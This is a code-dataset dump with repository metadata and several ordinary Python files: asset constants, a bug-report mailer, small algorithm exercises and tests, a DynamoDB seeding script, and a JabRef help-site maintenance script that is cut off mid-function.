hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
97b143a625ae8a0523c3e9e9d1962c33d36209c6
| 2,445 |
py
|
Python
|
external/Assimp/port/PyAssimp/pyassimp/material.py
|
IKholopov/TierGine
|
1a3c7cd2bed460af672d7cd5c33d7e7863043989
|
[
"Apache-2.0"
] | 36 |
2017-03-27T16:57:47.000Z
|
2022-01-12T04:17:55.000Z
|
external/Assimp/port/PyAssimp/pyassimp/material.py
|
IKholopov/TierGine
|
1a3c7cd2bed460af672d7cd5c33d7e7863043989
|
[
"Apache-2.0"
] | 56 |
2019-01-31T19:57:09.000Z
|
2019-08-11T17:09:16.000Z
|
external/Assimp/port/PyAssimp/pyassimp/material.py
|
IKholopov/TierGine
|
1a3c7cd2bed460af672d7cd5c33d7e7863043989
|
[
"Apache-2.0"
] | 24 |
2019-01-14T23:05:04.000Z
|
2020-03-24T13:35:27.000Z
|
## <hr>Dummy value.
#
# No texture, but the value to be used as 'texture semantic'
# (#aiMaterialProperty::mSemantic) for all material properties
# *not* related to textures.
#
aiTextureType_NONE = 0x0
## <hr>The texture is combined with the result of the diffuse
# lighting equation.
#
aiTextureType_DIFFUSE = 0x1
## <hr>The texture is combined with the result of the specular
# lighting equation.
#
aiTextureType_SPECULAR = 0x2
## <hr>The texture is combined with the result of the ambient
# lighting equation.
#
aiTextureType_AMBIENT = 0x3
## <hr>The texture is added to the result of the lighting
# calculation. It isn't influenced by incoming light.
#
aiTextureType_EMISSIVE = 0x4
## <hr>The texture is a height map.
#
# By convention, higher gray-scale values stand for
# higher elevations from the base height.
#
aiTextureType_HEIGHT = 0x5
## <hr>The texture is a (tangent space) normal-map.
#
# Again, there are several conventions for tangent-space
# normal maps. Assimp does (intentionally) not
# distinguish here.
#
aiTextureType_NORMALS = 0x6
## <hr>The texture defines the glossiness of the material.
#
# The glossiness is in fact the exponent of the specular
# (phong) lighting equation. Usually there is a conversion
# function defined to map the linear color values in the
# texture to a suitable exponent. Have fun.
#
aiTextureType_SHININESS = 0x7
## <hr>The texture defines per-pixel opacity.
#
# Usually 'white' means opaque and 'black' means
# 'transparency'. Or quite the opposite. Have fun.
#
aiTextureType_OPACITY = 0x8
## <hr>Displacement texture
#
# The exact purpose and format is application-dependent.
# Higher color values stand for higher vertex displacements.
#
aiTextureType_DISPLACEMENT = 0x9
## <hr>Lightmap texture (aka Ambient Occlusion)
#
# Both 'Lightmaps' and dedicated 'ambient occlusion maps' are
# covered by this material property. The texture contains a
# scaling value for the final color value of a pixel. Its
# intensity is not affected by incoming light.
#
aiTextureType_LIGHTMAP = 0xA
## <hr>Reflection texture
#
#Contains the color of a perfect mirror reflection.
#Rarely used, almost never for real-time applications.
#
aiTextureType_REFLECTION = 0xB
## <hr>Unknown texture
#
# A texture reference that does not match any of the definitions
# above is considered to be 'unknown'. It is still imported
# but is excluded from any further postprocessing.
#
aiTextureType_UNKNOWN = 0xC
| 27.166667 | 64 | 0.762781 |
e7df70c258915d7e843436756251798bf210779e
| 5,689 |
py
|
Python
|
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from config import app
# Sending confirmation email to the reporter
class ReporterSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'Thanks for reporting the bug'
# The email needs to be written in HTML first then pure text for complete compatibility
messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>Thanks for reporting the bug</h1></td></tr></tbody></table><h2> </h2><h2>Summary of your report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
messagePlain = f"Thanks for reporting the bug\nSummary of your report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
# We define the MIME module and say that there is an alternative for the HTML email for it to use it
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = recipient_email
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
# We define our SMTP server (using gmail here you need to enable less secure apps to use it)
server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
# Starting a secure TLS connection and logining in
server.starttls()
server.login(email, password)
# turning the MIME message into string and finally sending the email then closing the connection
text = msg.as_string()
server.sendmail(email, recipient_email, text)
server.quit()
class AdminSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'A new bug has been reported'
# The email needs to be written in HTML first then pure text for complete compatibility
messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>Thanks for reporting the bug</h1></td></tr></tbody></table><h2> </h2><h2>Summary of the report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
messagePlain = f"Thanks for reporting the bug\nSummary of your report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
# We define the MIME module and say that there is an alternative for the HTML email for it to use it
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = app.config['ADMIN_EMAIL']
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
# We define our SMTP server (using gmail here you need to enable less secure apps to use it)
server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
# Starting a secure TLS connection and logining in
server.starttls()
server.login(email, password)
# turning the MIME message into string and finally sending the email then closing the connection
text = msg.as_string()
server.sendmail(email, app.config['ADMIN_EMAIL'], text)
server.quit()
| 87.523077 | 1,150 | 0.675163 |
821f97a61aa7a46e2b10c705af230637a92179e0
| 876 |
py
|
Python
|
2-resources/_External-learning-resources/02-pyth/python-patterns-master/tests/behavioral/test_observer.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
2-resources/_External-learning-resources/02-pyth/python-patterns-master/tests/behavioral/test_observer.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
2-resources/_External-learning-resources/02-pyth/python-patterns-master/tests/behavioral/test_observer.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 1 |
2021-11-05T07:48:26.000Z
|
2021-11-05T07:48:26.000Z
|
from unittest.mock import Mock, patch
import pytest
from patterns.behavioral.observer import Data, DecimalViewer, HexViewer
@pytest.fixture
def observable():
return Data("some data")
def test_attach_detach(observable):
decimal_viewer = DecimalViewer()
assert len(observable._observers) == 0
observable.attach(decimal_viewer)
assert decimal_viewer in observable._observers
observable.detach(decimal_viewer)
assert decimal_viewer not in observable._observers
def test_one_data_change_notifies_each_observer_once(observable):
observable.attach(DecimalViewer())
observable.attach(HexViewer())
with patch(
"patterns.behavioral.observer.DecimalViewer.update", new_callable=Mock()
) as mocked_update:
assert mocked_update.call_count == 0
observable.data = 10
assert mocked_update.call_count == 1
| 25.764706 | 80 | 0.753425 |
417fc976e5fb277b2cbdaf4bddd58babbd7ec570
| 1,293 |
py
|
Python
|
数据结构/NowCode/12_FindKthToTail.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | null | null | null |
数据结构/NowCode/12_FindKthToTail.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | 3 |
2020-08-14T07:50:27.000Z
|
2020-08-14T08:51:06.000Z
|
数据结构/NowCode/12_FindKthToTail.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | 2 |
2021-03-14T05:58:45.000Z
|
2021-08-29T17:25:52.000Z
|
# 链表中倒数第K个节点
# 输入一个链表,输出该链表中倒数第k个结点。
# 链表结构
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# 打印链表
def printChain(head):
node = head
while node:
print(node.val)
node = node.next
class Solution:
def FindKthToTail(self, head, k):
if k <= 0 or head == []:
return None
node = head
list = []
while node:
list.append(node)
node = node.next
# K比链表长度大
if k > len(list):
return None
return list[len(list) - k]
def FindKthToTail2(self, head, k):
if k <= 0 or head == []:
return None
list = []
first = head
second = head
# 先让第一个节点走 K步
for i in range(0, k):
if first == None:
return None
first = first.next
# 然后两个节点在继续走,当first走到头的时候,second就是倒数第K个节点
while first:
first = first.next
second = second.next
return second
if __name__ == '__main__':
# 创建链表
l1 = ListNode(1)
l2 = ListNode(2)
l3 = ListNode(3)
l4 = ListNode(4)
l5 = ListNode(5)
l1.next = l2
l2.next = l3
l3.next = l4
l4.next = l5
print(Solution().FindKthToTail2(l1, 1))
| 20.203125 | 49 | 0.501933 |
68fce63461c016416b598b5a35d6b356fdb5d81e
| 2,294 |
py
|
Python
|
2016/day01_no_time_for_a_taxicab/python/src/part2.py
|
tlake/advent-of-code
|
17c729af2af5f1d95ba6ff68771a82ca6d00b05d
|
[
"MIT"
] | null | null | null |
2016/day01_no_time_for_a_taxicab/python/src/part2.py
|
tlake/advent-of-code
|
17c729af2af5f1d95ba6ff68771a82ca6d00b05d
|
[
"MIT"
] | null | null | null |
2016/day01_no_time_for_a_taxicab/python/src/part2.py
|
tlake/advent-of-code
|
17c729af2af5f1d95ba6ff68771a82ca6d00b05d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Find shortest taxicab distance."""
import re
from common import get_input
class Walker(object):
"""Class for turning walking directions into distance from start."""
def __init__(self, input_string):
"""Initialize."""
self.directions = self._listify_input(input_string.lower())
self.steps = [0, 0, 0, 0]
self.facing = 0
self.locations = [(0, 0)]
self.new_loc = (0, 0)
def _listify_input(self, input_string):
"""Turn a string of inputs into a list."""
stripped_string = re.sub(r'\s+', '', input_string.strip())
split_list = stripped_string.split(",")
return [(x[0], int(x[1::])) for x in split_list]
def make_rotation(self, rotation):
"""Turn left or right, and update self.facing."""
if rotation == "r":
self.facing += 1
else:
self.facing -= 1
if self.facing > 3:
self.facing = self.facing - 4
elif self.facing < 0:
self.facing = self.facing + 4
def take_step(self):
"""Move [steps] forward and update coordinates."""
if self.facing == 0:
self.new_loc = (self.new_loc[0], self.new_loc[1] + 1)
elif self.facing == 1:
self.new_loc = (self.new_loc[0] + 1, self.new_loc[1])
elif self.facing == 2:
self.new_loc = (self.new_loc[0], self.new_loc[1] - 1)
else:
self.new_loc = (self.new_loc[0] - 1, self.new_loc[1])
def travel(self, steps):
"""."""
step = 1
while step <= steps:
self.take_step()
if self.new_loc in self.locations:
return True
else:
self.locations.append(self.new_loc)
step += 1
return False
def run(self):
"""Step through the directions list and return the distance."""
for direction in self.directions:
rotation = direction[0]
steps = direction[1]
self.make_rotation(rotation)
hq_found = self.travel(steps)
if hq_found:
return (abs(self.new_loc[0] + self.new_loc[1]))
if __name__ == "__main__":
walker = Walker(get_input())
print(walker.run())
| 29.037975 | 72 | 0.547079 |
d475380cb190a0eb870c03d1764b5d95f3892d0e
| 3,591 |
py
|
Python
|
2-resources/__CHEAT-SHEETS/cheatsheets-master/cheatsheets-master/dynamodb/python/script.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 103 |
2019-08-30T10:04:40.000Z
|
2022-03-30T22:14:44.000Z
|
2-resources/__CHEAT-SHEETS/cheatsheets-master/cheatsheets-master/dynamodb/python/script.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 6 |
2021-04-08T08:36:27.000Z
|
2021-10-01T07:47:17.000Z
|
2-resources/__CHEAT-SHEETS/cheatsheets-master/cheatsheets-master/dynamodb/python/script.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 51 |
2019-06-10T06:11:46.000Z
|
2022-03-30T16:33:05.000Z
|
import boto3
import time
import random
import datetime
client = boto3.Session(region_name='eu-west-1').client('dynamodb', aws_access_key_id='', aws_secret_access_key='', endpoint_url='http://localhost:4567')
userlists = {}
userlists['john'] = {'id':'johnsnow9801', 'firstname': 'john', 'age': '23', 'location': 'south africa', 'rank': 'professional'}
userlists['max'] = {'id':'maxmilia', 'firstname': 'max', 'age': '24', 'location': 'new zealand', 'rank': 'professional'}
userlists['samantha'] = {'id':'sambubbles8343', 'firstname': 'samantha', 'age': '21', 'location': 'australia', 'rank': 'professional'}
userlists['aubrey'] = {'id':'aubreyxeleven4712', 'firstname': 'aubrey', 'age': '24', 'location': 'america', 'rank': 'professional'}
userlists['mikhayla'] = {'id':'mikkie1419', 'firstname': 'mikhayla', 'age': '21', 'location': 'mexico', 'rank': 'professional'}
userlists['steve'] = {'id':'stevie1119', 'firstname': 'steve', 'age': '25', 'location': 'ireland', 'rank': 'professional'}
userlists['rick'] = {'id':'rickmax0901', 'firstname': 'rick', 'age': '20', 'location': 'sweden', 'rank': 'professional'}
userlists['michael'] = {'id':'mikeshank2849', 'firstname': 'michael', 'age': '26', 'location': 'america', 'rank': 'professional'}
userlists['paul'] = {'id':'paulgru2039', 'firstname': 'paul', 'age': '26', 'location': 'sweden', 'rank': 'professional'}
userlists['nathalie'] = {'id':'natscotia2309', 'firstname': 'nathalie', 'age': '21', 'location': 'america', 'rank': 'professional'}
userlists['scott'] = {'id':'scottie2379', 'firstname': 'scott', 'age': '23', 'location': 'new zealand', 'rank': 'professional'}
userlists['will'] = {'id':'wilson9335', 'firstname': 'will', 'age': '27', 'location': 'sweden', 'rank': 'professional'}
userlists['adrian'] = {'id':'adriano5519', 'firstname': 'adrian', 'age': '22', 'location': 'ireland', 'rank': 'professional'}
userlists['julian'] = {'id':'jules8756', 'firstname': 'julian', 'age': '27', 'location': 'mexico', 'rank': 'professional'}
userlists['rico'] = {'id':'ricololo4981', 'firstname': 'rico', 'age': '20', 'location': 'sweden', 'rank': 'professional'}
userlists['kate'] = {'id':'kitkatkate0189', 'firstname': 'kate', 'age': '24', 'location': 'south africa', 'rank': 'professional'}
events = []
events = [
{
'name': 'gaming_nationals_round_01',
'game': 'counter_strike'
},
{
'name': 'gaming_nationals_round_02',
'game': 'fifa'
},
{
'name': 'gaming_nationals_round_03',
'game': 'rocket_league'
},
{
'name': 'gaming_nationals_round_04',
'game': 'world_of_warcraft'
},
{
'name': 'gaming_nationals_round_05',
'game': 'pubg'
},
{
'name': 'gaming_nationals_round_06',
'game': 'league_of_legends'
},
{
'name': 'gaming_nationals_round_07',
'game': 'dota'
}
]
users = userlists.keys()
def generate(name, eventname):
item = {
'event': {'S': eventname['name']},
'timestamp': {'S': datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M")},
'gamerid': {'S': name['id']},
'name': {'S': name['firstname']},
'age': {'N': str(name['age'])},
'location': {'S': name['location']},
'game': {'S': eventname['game']},
'score': {'N': str(random.randint(10000, 19999))},
'rank': {'S': name['rank']}}
return item
for eventname in events:
for user in users:
item = generate(userlists[user], eventname)
print("Event: {} - submitting scores to dynamodb for {}".format(item['event']['S'], user))
response = client.put_item(TableName='gamescores', Item=item)
time.sleep(300)
print("")
print("done")
| 43.792683 | 152 | 0.614314 |
2b4bcac9adf6cddccee381cf59c2e64ef6dd93fc
| 584 |
py
|
Python
|
code/Dictionaries.py
|
ju1-eu/pyAnfaenger
|
59440e99d69582ee2c7a022c8b819e7c78f41ac0
|
[
"MIT"
] | null | null | null |
code/Dictionaries.py
|
ju1-eu/pyAnfaenger
|
59440e99d69582ee2c7a022c8b819e7c78f41ac0
|
[
"MIT"
] | null | null | null |
code/Dictionaries.py
|
ju1-eu/pyAnfaenger
|
59440e99d69582ee2c7a022c8b819e7c78f41ac0
|
[
"MIT"
] | null | null | null |
# Liste
names = ["Ben", "Jan", "Peter", "Melissa"]
noten = [1, 2, 1, 4]
# dict {(key, value)}
names_and_noten = {"Ben": 1, "Jan": 2, "Peter": 1, "Melissa": 4}
# Wert hinzufügen
names_and_noten.update({"Pia": 3})
# oder
names_and_noten["Julia"] = 1
# Wert entfernen
names_and_noten.pop("Julia")
# Keys
for k in names_and_noten.keys():
print(k)
# Values = Werte
for v in names_and_noten.values():
print(v)
# Keys und Values
for k, v in names_and_noten.items():
print(k, v)
# Ist Key vorhanden?
if "Julia" in names_and_noten:
present = True
else:
present = False
| 19.466667 | 64 | 0.64726 |
5aa325525b7c0bda7b96ce01496d99f232ccd463
| 2,554 |
py
|
Python
|
2016/day04_security_through_obscurity/python/src/test_solutions.py
|
tlake/advent-of-code
|
17c729af2af5f1d95ba6ff68771a82ca6d00b05d
|
[
"MIT"
] | null | null | null |
2016/day04_security_through_obscurity/python/src/test_solutions.py
|
tlake/advent-of-code
|
17c729af2af5f1d95ba6ff68771a82ca6d00b05d
|
[
"MIT"
] | null | null | null |
2016/day04_security_through_obscurity/python/src/test_solutions.py
|
tlake/advent-of-code
|
17c729af2af5f1d95ba6ff68771a82ca6d00b05d
|
[
"MIT"
] | null | null | null |
"""."""
import pytest
from solution1 import RoomAnalyzer as ra1
from solution2 import RoomAnalyzer as ra2
class TestPart1UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
("aaaaa-bbb-z-y-x-123[abxyz]", ("aaaaabbbzyx", 123, "abxyz")),
("a-b-c-d-e-f-g-h-987[abcde]", ("abcdefgh", 987, "abcde")),
("not-a-real-room-404[oarel]", ("notarealroom", 404, "oarel")),
("totally-real-room-200[decoy]", ("totallyrealroom", 200, "decoy"))
])
def test_process_room_string(self, test_input, expected):
"""."""
analyzer = ra1()
assert(analyzer.process_room_string(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
("aaaaa-bbb-z-y-x-123[abxyz]", True),
("a-b-c-d-e-f-g-h-987[abcde]", True),
("not-a-real-room-404[oarel]", True),
("totally-real-room-200[decoy]", False)
])
def test_room_is_real(self, test_input, expected):
"""."""
analyzer = ra1()
name, _, checksum = analyzer.process_room_string(test_input)
assert(analyzer.room_is_real(name, checksum) == expected)
@pytest.mark.parametrize("test_input, expected", [
("aaaaa-bbb-z-y-x-123[abxyz]", 123),
("a-b-c-d-e-f-g-h-987[abcde]", 987),
("not-a-real-room-404[oarel]", 404),
("totally-real-room-200[decoy]", 0)
])
def test_analyze_room(self, test_input, expected):
"""."""
analyzer = ra1()
assert(analyzer.analyze_room(test_input) == expected)
def test_analyze_input(self):
"""."""
test_input = [
"aaaaa-bbb-z-y-x-123[abxyz]",
"a-b-c-d-e-f-g-h-987[abcde]",
"not-a-real-room-404[oarel]",
"totally-real-room-200[decoy]",
]
expected = 1514
analyzer = ra1(test_input)
assert(analyzer.analyze_input() == expected)
class TestPart2UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
(('a', 2), 'c'),
(('a', 25), 'z'),
(('a', 26), 'a'),
(('z', 2), 'b'),
(('a', 53), 'b'),
((' ', 2), ' ')
])
def test__shift(self, test_input, expected):
"""."""
analyzer = ra2()
assert(analyzer._shift(test_input) == expected)
def test_decipher(self):
"""."""
test_input = ("qzmt zixmtkozy ivhz", 343)
expected = "very encrypted name"
analyzer = ra2()
assert(analyzer.decipher(test_input[0], test_input[1]) == expected)
| 31.925 | 75 | 0.550117 |
5ab17da7bc5572c55edd0f9d96682a83df68d6a3
| 31,731 |
py
|
Python
|
_scripts/automate.py
|
sakshamtaneja21/help.jabref.org
|
98fba5fa4a774c38b34f354b42329df75ce8e2de
|
[
"CC-BY-4.0"
] | null | null | null |
_scripts/automate.py
|
sakshamtaneja21/help.jabref.org
|
98fba5fa4a774c38b34f354b42329df75ce8e2de
|
[
"CC-BY-4.0"
] | null | null | null |
_scripts/automate.py
|
sakshamtaneja21/help.jabref.org
|
98fba5fa4a774c38b34f354b42329df75ce8e2de
|
[
"CC-BY-4.0"
] | 1 |
2019-10-20T06:48:18.000Z
|
2019-10-20T06:48:18.000Z
|
from __future__ import print_function
import argparse
import codecs
import datetime
import json
import os
import subprocess
from os import listdir
from os.path import isfile, join, isdir
import logger
try:
import frontmatter
except ImportError, e:
logger.error("The 'python-frontmatter' package is not available\n" +
"Install it with 'pip install python-frontmatter'")
quit()
COMMAND_STATUS = "status"
COMMAND_UPDATE = "update"
COMMAND_CLEAN = "clean"
COMMAND_REMOVE_SUFFIX = "removeHelpSuffix"
MAIN_LANGUAGE = "en"
FRONTMATTER_CATEGORIES = "helpCategories"
FRONTMATTER_TITLE = "title"
FRONTMATTER_OUTDATED = "outdated"
FILE_CATEGORIES_ORDER = "_scripts/categories.json"
FILE_STATUS = "status.md"
def get_language_file_path(language):
"""
:param language: string
:return: string: path to where the language file lies
"""
return "{lang}/localization_{lang}.json".format(lang=language)
def read_file(filename, encoding="UTF-8"):
"""
:param filename: string
:param encoding: string: the encoding of the file to read (standart: `UTF-8`)
:return: list of strings: the lines of the file
"""
f1 = codecs.open(filename, encoding=encoding)
lines = f1.read()
f1.close()
return lines
def write_file(filename, content):
"""
writes the lines to the file in `UTF-8`
:param filename: string
:param content: list: the lines to write
"""
codecs.open(filename, "w", encoding='utf-8').writelines(content)
def get_local_file_path(language, page):
"""
:param language: string
:param page: string
:return: String: path without '/' at the beginning
"""
return "{lang}/{page}".format(lang=language, page=page)
def get_relative_file_link(language, page):
"""
:param language: string
:param page: string
:return: String: path with '/' at the beginning, but without '.md' at the end
"""
# remove .md at the end
return "/{lang}/{page}".format(lang=language, page=page)[:-3]
def get_file_link(language, page):
"""
:param language: string
:param page: string
:return: string: link directly to the github page
"""
filepath = get_local_file_path(language=language, page=page)
return "https://github.com/JabRef/help.jabref.org/blob/gh-pages/{file}".format(file=filepath)
def get_current_branch():
"""
:return: string: the current git branch
"""
return subprocess.check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).strip("\n")
def get_current_hash_short():
"""
:return: string: the current git hash (short)
"""
return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).strip("\n")
def get_other_languages():
"""
:return: list of strings: all but the main language
"""
return [f for f in listdir(".") if
isdir(join(".", f)) and not f.startswith("_") and not f.startswith(".") and not f.startswith("css") and not f.startswith(MAIN_LANGUAGE)]
def get_all_languages():
"""
:return: list: of strings all languages with the main language at the beginning
"""
languages = get_other_languages()
languages.insert(0, MAIN_LANGUAGE)
return languages
def get_help_pages_in(language):
"""
:param language: string
:return: list of strings: all help pages (including redirecting pages)
"""
return [f for f in listdir(language) if isfile(join(language, f)) and f.endswith(".md") and not f == "index.md"]
def get_categories_order():
"""
:return: list of strings and lists: the category order
"""
return json.loads(read_file(FILE_CATEGORIES_ORDER))
def get_include_page_path_to_main(language):
return "_includes/link-to-main-{}.html".format(language)
def get_include_page_path_to_toc(language):
return "_includes/link-to-toc-{}.html".format(language)
def does_category_exist(key):
"""
Checks if the key is in the main language file
:param key: string
:return: boolean
"""
file_path = get_language_file_path(language=MAIN_LANGUAGE)
try:
return key in json.loads(read_file(file_path))
except IOError:
logger.error("Cannot find main language file '{}'".format(MAIN_LANGUAGE))
except ValueError:
logger.error("Main language file is no valid json file '{}'".format(MAIN_LANGUAGE))
except KeyError:
logger.error("Language '{lang}' has no key '{key}'".format(lang=MAIN_LANGUAGE, key=key))
return False
def get_localization(language, key):
"""
:param language: string
:param key: string
:return: String: the localization or key if you cannot find the localization
"""
file_path = get_language_file_path(language=language)
try:
translation = json.loads(read_file(file_path))[key]
if not translation:
logger.error("Language file '{lang}' has an empty key '{key}'".format(lang=language, key=key))
else:
return translation
except IOError:
logger.error("Cannot find language file '{}'".format(language))
except ValueError:
logger.error("Language file is no valid json file '{}'".format(language))
except KeyError:
logger.error("Language '{lang}' has no key '{key}'".format(lang=language, key=key))
return key
def get_redirect_page_content(language, page):
"""
:param language: string
:param page: string
:return: string: the formatted frontmatter of a redirecting page
"""
return """---
redirect: {path}
layout: redirect
---
""".format(path=get_relative_file_link(language=language, page=page))
def get_index_header(title, more_questions, forum):
"""
:param title: string
:param more_questions: string
:param forum: string
:return: string: the formatted frontmatter + forum link of an index page
"""
return u"""---
title: {title}
---
# {title}
<div class="panel panel-info">
<div class="panel-heading">
<strong>{more_questions}</strong>
</div>
<div class="panel-body">
<a class="btn btn-default" role="button" href="http://discourse.jabref.org">{forum}</a>
</div>
</div>\n\n""".format(title=title, more_questions=more_questions, forum=forum)
def is_redirect_page(language, page):
"""
:param language: string
:param page: string
:return: boolean: True if this page is redirected to the main language one
"""
with open(get_local_file_path(language=language, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
redirect_layout = post["layout"] == "redirect" if "layout" in post.keys() else False
link = get_relative_file_link(language=MAIN_LANGUAGE, page=page)
redirect_link = post["redirect"] == link if "redirect" in post.keys() else False
return redirect_layout and redirect_link and not post.content
def is_old_help_page_redirecting_to_new_one(language, page):
"""
:param language: string
:param page: string
:return: boolean True if this help page was renamed and is redirecting to the new one
"""
with open(get_local_file_path(language=language, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
redirect_layout = post["layout"] == "redirect" if "layout" in post.keys() else False
redirect_not_to_en = post["redirect"].startswith("/{}/".format(language)) if "redirect" in post.keys() else False
return redirect_layout and redirect_not_to_en and not post.content
def create_redirect_page(language, page):
"""
creates a page which redirects to the main language one
:param language: string
:param page: string
"""
path = get_local_file_path(language=language, page=page)
if is_old_help_page_redirecting_to_new_one(language=MAIN_LANGUAGE, page=page):
with open(get_local_file_path(language=MAIN_LANGUAGE, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
new_page = post["redirect"].replace("/{}/".format(MAIN_LANGUAGE), "", 1) + ".md"
write_file(filename=path, content=get_redirect_page_content(language=language, page=new_page))
else:
write_file(filename=path, content=get_redirect_page_content(language=MAIN_LANGUAGE, page=page))
def delete_redirecting_help_pages(language):
"""
:param language: string
:return: list of strings: deletes all pages which redirects to the page in the main language and returns their names
"""
deleted_pages = []
for page in get_help_pages_in(language=language):
if is_redirect_page(language=language, page=page) or is_old_help_page_redirecting_to_new_one(language=language, page=page):
